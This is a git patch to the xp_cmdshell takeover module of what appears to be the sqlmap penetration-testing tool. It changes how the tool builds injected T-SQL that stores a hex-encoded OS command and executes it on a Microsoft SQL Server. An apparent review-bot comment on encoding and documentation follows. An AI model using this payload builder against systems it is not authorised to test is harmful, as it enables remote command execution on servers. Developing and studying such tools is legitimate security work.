From 18be319d1383559ac5e458a9150165ac8bb4fcd7 Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Date: Sun, 1 Jul 2012 23:41:10 +0100
Subject: [PATCH] hexencoding the command is much shorter than unescaping with CHAR() for MSSQL, also no need for spaces between nested comments when forging the xp_cmdshell command to run

---
 lib/takeover/xp_cmdshell.py | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index 20a0236f1..89f81ce31 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -14,6 +14,7 @@ from lib.core.common import popValue
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.common import wasLastRequestDelayed
+from lib.core.convert import hexencode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -148,9 +149,9 @@ class xp_cmdshell:
     def xpCmdshellForgeCmd(self, cmd):
         self.__randStr = randomStr(lowercase=True)
 
-        self.__cmd = unescaper.unescape("'%s'" % cmd)
-        self.__forgedCmd = "DECLARE @%s VARCHAR(8000); " % self.__randStr
-        self.__forgedCmd += "SET @%s = %s; " % (self.__randStr, self.__cmd)
+        self.__cmd = "0x%s" % hexencode(cmd)
+        self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
+        self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
         self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
 
         return self.__forgedCmd
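Review bot: The new `self.__cmd = "0x%s" % hexencode(cmd)` line leaves the text encoding of the command unstated: the 0x literal is assigned to a VARCHAR variable, so the server decodes those bytes under its own code page, and if `hexencode` is a thin wrapper over a byte-level hex conversion, a `cmd` holding non-ASCII characters may either fail to encode on the Python side or come out differently on the server side; worth pinning with a comment such as `# cmd is sent as a 0x hex literal (no quoting needed); non-ASCII text depends on the server code page`. The method also has no docstring; one along the lines of `"""Build the T-SQL that stores *cmd* in a VARCHAR(8000) variable as a hex literal and EXECs it through xp_cmdshell; returns the forged statement."""` would document the contract. The VARCHAR(8000) bound means a command longer than 8000 bytes is silently truncated by the implicit conversion, which predates this change but is not mentioned anywhere. Finally, `self.__cmd` and `self.__forgedCmd` appear to serve only as temporaries inside this method; if nothing else reads them, plain locals would make the data flow clearer. `xpCmdshellForgeCmd` fits entirely within the hunk.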